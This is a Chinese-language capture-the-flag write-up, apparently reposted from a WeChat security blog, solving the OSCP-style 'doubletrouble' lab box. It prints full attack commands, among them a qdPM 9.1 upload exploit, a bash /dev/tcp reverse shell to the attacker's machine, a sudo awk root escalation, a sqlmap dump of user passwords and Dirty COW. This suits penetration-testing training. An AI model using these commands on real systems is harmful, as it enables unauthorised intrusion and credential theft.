【OSCP】doubletrouble

admin 2024年9月26日11:48:18评论20 views字数 1832阅读6分6秒阅读模式
【OSCP】doubletrouble

OSCP 靶场

【OSCP】doubletrouble

靶场介绍

doubletrouble

easy

qdPM getshell、图片隐写、steghide 使用、stegseek使用&爆破、awk 提权、sql 盲注、命令执行漏洞、脏牛提权

信息收集

主机发现

nmap -sn 192.168.56.0/24

端口扫描

端口就开放22、80

【OSCP】doubletrouble

指纹信息

【OSCP】doubletrouble

searchsploit 搜一下,qdPM9.1 版本存在多个漏洞

【OSCP】doubletrouble

【OSCP】doubletrouble

这里我们使用https://www.exploit-db.com/exploits/47954 exp,但是需要账户密码,接下来再搜集信息;

目录扫描

dirsearch -u http://192.168.56.105 -e php

目录扫描只发现一个比较有用的信息是一张图片,应该就是主题的。

【OSCP】doubletrouble

【OSCP】doubletrouble

下载下来使用steghide 隐写工具提取信息,但是存在密码,需要爆破密码先

【OSCP】doubletrouble

使用 stegseek 工具进行爆破密码

https://github.com/RickdeJager/StegSeek

【OSCP】doubletrouble

爆破成功获取密码后,我们使用密码提取隐写的信息,账户密码到手了。接下来尝试打 exp

【OSCP】doubletrouble

爆破成功获取密码后,我们使用密码提取隐写的信息,账户密码到手了。接下来尝试打 exp

【OSCP】doubletrouble

权限获取

漏洞描述:qdPM 9.1版本中存在安全漏洞。攻击者可通过上传恶意的.php文件利用该漏洞在服务器上执行任意命令。https://jcyj.chd.edu.cn/2020/0422/c5172a126297/page.htm

https://www.exploit-db.com/exploits/47954
python3 qdPM.9.1.py -url http://192.168.56.105/ -u [email protected] -p otis666

【OSCP】doubletrouble

EXP 写入后门文件,接下了写一个小马进去使用蚁剑方便操作

【OSCP】doubletrouble

【OSCP】doubletrouble

试一下全局找flag 并没有结果,接着来找一下账户密码

find / -name "*flag*"

【OSCP】doubletrouble

看了一下系统用户和home 目录只有root 可登录,所以数据库这个密码目前没啥用处,接下来进行提权

【OSCP】doubletrouble

权限提升

反弹一个shell 到Kali 方便提权,然后我们使用 python 获取一个交互shell,加配置tab 补全功能。

bash -c 'exec bash -i &>/dev/tcp/192.168.56.101/9090 <&1'

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
Ctrl+z
stty -a
stty raw -echo;fg

【OSCP】doubletrouble

sudo -l 查看后,发现可以直接使用sudo 提权,我们可以通过辅助网站可以查看使用命令

https://gtfobins.github.io/gtfobins/awk/#sudo

【OSCP】doubletrouble

sudo awk 'BEGIN {system("/bin/sh")}'

【OSCP】doubletrouble

python3 -c "import pty;pty.spawn('/bin/bash')"

【OSCP】doubletrouble

提权后并没有发现存在flag,但是root目录下存在一个镜像,我们使用python3 开启一个http服务把它下载下来

【OSCP】doubletrouble

导入第二个靶场后,只发现一个web 服务存在盲注:

【OSCP】doubletrouble

使用sqlmap 跑出账号密码

sqlmap -u http://192.168.56.106/index.php --forms -D doubletrouble -T users --dump

Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1 | montreux |
| ZubZub99 | clapton |
+----------+----------+

【OSCP】doubletrouble

但是这里的账号密码都登录不了。。。尝试登录ssh clapton 账号成功登录

【OSCP】doubletrouble

获取一个FLAG

【OSCP】doubletrouble

6CEA7A737C7C651F6DA7669109B5FB52

进去之后可以看到登录后存在一个命令执行漏洞:

【OSCP】doubletrouble

接下来使用脏牛进行提权

【OSCP】doubletrouble

https://github.com/FireFart/dirtycow

gcc -pthread dirty.c -o dirty -lcrypt
./dirty my-new-password
mv /tmp/passwd.bak /etc/passwd

提权后获取flag

【OSCP】doubletrouble

【OSCP】doubletrouble

End

“点赞、在看与分享都是莫大的支持”

【OSCP】doubletrouble

【OSCP】doubletrouble

原文始发于微信公众号(贝雷帽SEC):【OSCP】doubletrouble

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月26日11:48:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】doubletroublehttp://cn-sec.com/archives/3209276.html

发表评论

匿名网友 填写信息